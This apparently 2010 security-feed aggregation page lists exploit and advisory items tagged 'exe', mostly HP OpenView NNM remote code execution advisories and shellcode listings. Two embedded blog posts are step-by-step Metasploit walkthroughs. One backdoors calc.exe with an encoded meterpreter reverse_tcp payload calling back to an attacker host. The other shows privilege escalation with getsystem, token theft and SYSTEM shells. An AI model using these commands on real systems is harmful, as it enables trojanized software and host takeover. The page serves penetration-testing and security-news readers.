   » ‎ SecurityFocus Vulnerabilities
  Re: Binary Planting Goes "EXE"

  Tags:  exe planting binary  

• August 27, 2010
• 4:14

  flash player 9.exe DLL Hijacking Exploit (schannel.dll)

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  flash player 9.exe DLL Hijacking Exploit (schannel.dll)

  Tags:  exe dll player hijacking flash-player-9  

• July 03, 2010
• 12:03

  getnnmdata-exec.txt

   » ‎ Packet Storm Security Recent Files
  The getnnmdata.exe CGI in HP OpenView NNM suffers from an invalid maxage remote code execution vulnerability.

  Tags:  exe txt getnnmdata hp-openview-nnm code-execution vulnerability  

• 12:03

  icount-exec.txt

   » ‎ Packet Storm Security Recent Files
  The getnnmdata.exe CGI in HP OpenView NNM suffers from an invalid icount remote code execution vulnerability.

  Tags:  exe txt getnnmdata hp-openview-nnm code-execution vulnerability  

• 12:03

  nnmhostname-exec.txt

   » ‎ Packet Storm Security Recent Files
  The getnnmdata.exe CGI in HP OpenView NNM suffers from an invalid hostname remote code execution vulnerability.

  Tags:  exe txt getnnmdata hp-openview-nnm code-execution vulnerability  

• 12:02

  getnnmdata-exec.txt

   » ‎ Packet Storm Security Exploits
  The getnnmdata.exe CGI in HP OpenView NNM suffers from an invalid maxage remote code execution vulnerability.

  Tags:  exe txt getnnmdata hp-openview-nnm code-execution vulnerability  

• 12:02

  icount-exec.txt

   » ‎ Packet Storm Security Exploits
  The getnnmdata.exe CGI in HP OpenView NNM suffers from an invalid icount remote code execution vulnerability.

  Tags:  exe txt getnnmdata hp-openview-nnm code-execution vulnerability  

• 12:02

  nnmhostname-exec.txt

   » ‎ Packet Storm Security Exploits
  The getnnmdata.exe CGI in HP OpenView NNM suffers from an invalid hostname remote code execution vulnerability.

  Tags:  exe txt getnnmdata hp-openview-nnm code-execution vulnerability  

• June 25, 2010
• 1:00

  win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32 WinExec cmd.exe + ExitProcess Shellcode - 195 bytes

  Tags:  exe winexec cmd  

• June 16, 2010
• 23:01

  ZDI-10-108.txt

   » ‎ Packet Storm Security Recent Files
  Zero Day Initiative Advisory 10-108 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovwebsnmpsrv.exe process which can be reached remotely through the jovgraph.exe CGI program. By supplying overly large values to variables passed through an HTTP request a strcpy call within the main() function can be made to overflow a static buffer. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.

  Tags:  exe code vulnerability manager.-authentication network-node-manager zero-day arbitrary-code  

• 23:00

  ZDI-10-108.txt

   » ‎ Packet Storm Security Advisories
  Zero Day Initiative Advisory 10-108 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovwebsnmpsrv.exe process which can be reached remotely through the jovgraph.exe CGI program. By supplying overly large values to variables passed through an HTTP request a strcpy call within the main() function can be made to overflow a static buffer. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.

  Tags:  exe code vulnerability manager.-authentication network-node-manager zero-day arbitrary-code  

• June 08, 2010
• 19:00

  ZDI-10-105.txt

   » ‎ Packet Storm Security Recent Files
  Zero Day Initiative Advisory 10-105 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovwebsnmpsrv.exe process which can be reached remotely through the jovgraph.exe CGI program. When the ovwebsnmpsrv.exe process is started a function responsible for parsing command line arguments does not properly handle unrecognized options. By supplying an overly large unrecognized option through an HTTP request the error handling functionality can be made to overflow a static buffer while creating the error message. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.

  Tags:  exe code vulnerability manager.-authentication network-node-manager command-line-arguments zero-day  

• 19:00

  ZDI-10-106.txt

   » ‎ Packet Storm Security Recent Files
  Zero Day Initiative Advisory 10-106 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovutil.dll module which is loaded by the ovwebsnmpsrv.exe process which in turn can be reached remotely through the jovgraph.exe CGI program. By supplying overly large values to variables passed through an HTTP request a sprintf can be made to overflow a static buffer. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.

  Tags:  exe code vulnerability manager.-authentication network-node-manager dll-module zero-day  

• 19:00

  ZDI-10-105.txt

   » ‎ Packet Storm Security Advisories
  Zero Day Initiative Advisory 10-105 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovwebsnmpsrv.exe process which can be reached remotely through the jovgraph.exe CGI program. When the ovwebsnmpsrv.exe process is started a function responsible for parsing command line arguments does not properly handle unrecognized options. By supplying an overly large unrecognized option through an HTTP request the error handling functionality can be made to overflow a static buffer while creating the error message. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.

  Tags:  exe code vulnerability manager.-authentication network-node-manager command-line-arguments zero-day  

• 19:00

  ZDI-10-106.txt

   » ‎ Packet Storm Security Advisories
  Zero Day Initiative Advisory 10-106 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovutil.dll module which is loaded by the ovwebsnmpsrv.exe process which in turn can be reached remotely through the jovgraph.exe CGI program. By supplying overly large values to variables passed through an HTTP request a sprintf can be made to overflow a static buffer. An attacker can leverage this to execute arbitrary code under the context of the user running the webserver.

  Tags:  exe code vulnerability manager.-authentication network-node-manager dll-module zero-day  

• May 18, 2010
• 1:00

  win32/xp sp3 Fr (calc.exe) Shellcode 31 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 Fr (calc.exe) Shellcode 31 bytes

  Tags:  exe shellcode calc xp-sp3  

• May 11, 2010
• 20:00

  ZDI-10-081.txt

   » ‎ Packet Storm Security Recent Files
  Zero Day Initiative Advisory 10-081 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovet_demandpoll.exe process. This process can be started by invoking the webappmon.exe CGI application through the webserver. The process calls vnsprintf() directly with the contents of the 'sel' POST variable. By providing a malicious value this format string vulnerability can be leveraged by remote attackers to execute arbitrary code under the context of the ovet_demandpoll.exe process.

  Tags:  exe vulnerability process manager.-authentication network-node-manager hp-network zero-day  

• 20:00

  ZDI-10-082.txt

   » ‎ Packet Storm Security Recent Files
  Zero Day Initiative Advisory 10-082 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Network Monitor (netmon.exe) daemon. This process can be started by invoking the webappmon.exe CGI application through the webserver. When the _OVParseLLA function defined within ov.dll is called from netmon.exe it directly copies the value of the 'sel' POST variable into a fixed-length stack buffer with a call to strcpy(). This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.

  Tags:  exe code vulnerability manager.-authentication network-node-manager stack-buffer hp-network  

• 20:00

  ZDI-10-081.txt

   » ‎ Packet Storm Security Advisories
  Zero Day Initiative Advisory 10-081 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ovet_demandpoll.exe process. This process can be started by invoking the webappmon.exe CGI application through the webserver. The process calls vnsprintf() directly with the contents of the 'sel' POST variable. By providing a malicious value this format string vulnerability can be leveraged by remote attackers to execute arbitrary code under the context of the ovet_demandpoll.exe process.

  Tags:  exe vulnerability process manager.-authentication network-node-manager hp-network zero-day  

• 20:00

  ZDI-10-082.txt

   » ‎ Packet Storm Security Advisories
  Zero Day Initiative Advisory 10-082 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Network Monitor (netmon.exe) daemon. This process can be started by invoking the webappmon.exe CGI application through the webserver. When the _OVParseLLA function defined within ov.dll is called from netmon.exe it directly copies the value of the 'sel' POST variable into a fixed-length stack buffer with a call to strcpy(). This can be leveraged by remote attackers to execute arbitrary code under the context of the webserver process.

  Tags:  exe code vulnerability manager.-authentication network-node-manager stack-buffer hp-network  

• April 27, 2010
• 1:00

  win32/xp sp3 (Fr) calc.exe shellcode 37 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 (Fr) calc.exe shellcode 37 bytes

  Tags:  exe calc shellcode xp-sp3  

• March 25, 2010
• 0:00

  Vuln: Intellicom 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Intellicom 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Vulnerability

  Tags:  exe netbiterconfig intellicom buffer-overflow-vulnerability stack-buffer  

• March 24, 2010
• 13:58

  xwine v1.0.1 (.exe file) Local Crash PoC Exploit

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  xwine v1.0.1 (.exe file) Local Crash PoC Exploit

  Tags:  exe xwine file crash  

• 11:38

  Msfencode a Msfpayload Into An Existing Executable

   » ‎ Carnal0wnage
  Very cool update to metasploit today:
  
  http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
  
  This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
  
  let's see the new msfencode options:
  
  ~/trunk$ ./msfencode -h
  
  Usage: ./msfencode
  
  OPTIONS:
  
  -a The architecture to encode as
  -b The list of characters to avoid: '\x00\xff'
  -c The number of times to encode the data
  -e The encoder to use
  -h Help banner
  -i Encode the contents of the supplied file path
  -k Keep template working; run payload in new thread (use with -x)
  -l List available encoders
  -m Specifies an additional module search path
  -n Dump encoder information
  -o The output file
  -p The platform to encode for
  -s The maximum size of the encoded data
  -t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
  -x Specify an alternate win32 executable template
  
  Let's make our new backdoored executable.
  
  ~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
  [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
  [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
  [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
  [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
  [*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
  
  Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
  
  
  msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(handler) > set LHOST 192.168.210.11
  LHOST => 192.168.210.11
  msf exploit(handler) > exploit
  
  [*] Started reverse handler on 192.168.210.11:4444
  [*] Starting the payload handler...
  [*] Sending stage (748032 bytes)
  [*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
  
  
  Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
  
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > run migrate explorer.exe
  [*] Current server process: calc_backdoor.exe (3360)
  [*] Migrating to explorer.exe...
  [*] Migrating into process ID 1592
  [*] New server process: Explorer.EXE (1592)
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > getpid
  Current pid: 1592
  meterpreter >

  Tags:  exe msfencode meterpreter shikata-ga-nai raw-ruby module-search metasploit  

• March 13, 2010
• 6:00

  win32/xp sp3 (Ita) calc.exe shellcode 36 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 (Ita) calc.exe shellcode 36 bytes

  Tags:  exe calc ita xp-sp3  

• March 12, 2010
• 5:00

  win32/xp sp3 (Ita) calc.exe shellcode 36 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 (Ita) calc.exe shellcode 36 bytes

  Tags:  exe calc ita xp-sp3  

• March 11, 2010
• 20:00

  win32/xp sp3 (Ita) calc.exe shellcode 36 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 (Ita) calc.exe shellcode 36 bytes

  Tags:  exe calc ita xp-sp3  

• March 01, 2010
• 13:00

  win32/xp sp3 English (calc.exe) 37 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 English (calc.exe) 37 bytes

  Tags:  exe english calc xp-sp3 win32  

• February 28, 2010
• 3:00

  win32/xp sp2 English (calc.exe) 37 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp2 English (calc.exe) 37 bytes

  Tags:  exe english calc xp-sp2 win32  

• February 27, 2010
• 11:04

  how to dump file with rpos.exe

   » ‎ darkc0de
  how to dump file with rpos.exe

  Tags:  exe  

• February 26, 2010
• 15:04

  EXE Manipulatio

   » ‎ remote-exploit & backtrack
  Is there a program for Linux that I can manipulate EXE files such as merging and changing icons and file sizes?

  Tags:  exe program manipulatio exe-files linux file-sizes Newbie Area  

• February 09, 2010
• 0:00

  Vuln: SAP MaxDB 'cons.exe' Remote Command Injection Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  SAP MaxDB 'cons.exe' Remote Command Injection Vulnerability

  Tags:  exe maxdb sap vulnerability  

• January 29, 2010
• 22:05

  Meterpreter exe's now detected

   » ‎ remote-exploit & backtrack
  Good or bad news depending on who cares, but the meterpreter reverse_tcp payload embeded in an exe or shellcode within another exe is now detected:
  Virustotal. MD5: c32f921f597c7f82f4b48a7604b6d860 Trojan Horse Trojan.Vilsel.omg Trojan:W32/Rozena.gen!A
  
  also this was created with no encoders, although i dont think they would help.

  Tags:  exe trojan meterpreter horse-trojan trojan-w32 trojan-horse Pentesting  

• 10:24

  metasploit getsystem command

   » ‎ Carnal0wnage
  Shiny new hotness...
  
  meterpreter > getuid
  Server username: WINXPSP3\user **user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**
  
  meterpreter > use priv
  Loading extension priv...success.
  meterpreter > getsystem -h
  Usage: getsystem [options]
  
  Attempt to elevate your privilege to that of local system.
  
  OPTIONS:
  
  -h Help Banner.
  -t The technique to use. (Default to '0').
  0 : All techniques available
  1 : Service - Named Pipe Impersonation (In Memory/Admin)
  2 : Service - Named Pipe Impersonation (Dropper/Admin)
  3 : Service - Token Duplication (In Memory/Admin)
  4 : Exploit - KiTrap0D (In Memory/User)
  
  meterpreter > getsystem -t 1
  ...got system (via technique 1).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > rev2self
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > getsystem -t 2
  ...got system (via technique 2).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > rev2self
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > getsystem -t 3
  ...got system (via technique 3).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > rev2self
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > getsystem
  ...got system (via technique 4).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  
  Hey I want user back!
  
  meterpreter > getsystem -t 4
  ...got system (via technique 4).
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > rev2self
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  
  steal_token
  
  meterpreter > steal_token -h
  [-] Usage: steal_token [pid]
  
  meterpreter > ps
  
  Process list
  ============
  
  PID Name Arch User Path
  --- ---- ---- ---- ----
  0 [System Process]
  4 System x86 NT AUTHORITY\SYSTEM
  368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
  592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
  616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
  660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
  672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
  832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
  908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
  1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
  1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
  1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
  1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
  540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
  980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
  1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
  2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
  2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
  960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
  664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
  
  meterpreter > steal_token 1560
  Stolen token with username: WINXPSP3\user
  meterpreter > getuid
  Server username: WINXPSP3\user
  meterpreter > shell Process 1272 created. Channel 2 created.
  Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
  C:\Documents and Settings\user>whoami
  whoami
  WINXPSP3\user
  C:\Documents and Settings\user>
  
  wait I want a SYSTEM shell again
  
  meterpreter > drop_token
  Relinquished token, now running as: WINXPSP3\user
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > shell
  Process 856 created.
  Channel 3 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
  
  C:\Documents and Settings\user>whoami
  whoami
  NT AUTHORITY\SYSTEM
  
  C:\Documents and Settings\user>
  
  or call execute without -t to use your process token
  
  meterpreter > execute -f cmd.exe -i -c -H
  Process 676 created.
  Channel 5 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
  
  C:\Documents and Settings\user>whoami
  whoami
  NT AUTHORITY\SYSTEM
  
  C:\Documents and Settings\user>
  
  
  

  Tags:  exe authority system impersonation system-options hotness metasploit  

• January 22, 2010
• 12:00

  eXe Packer Collection

   » ‎ darkc0de
  eXe Packer Collection

  Tags:  collection exe exe-packer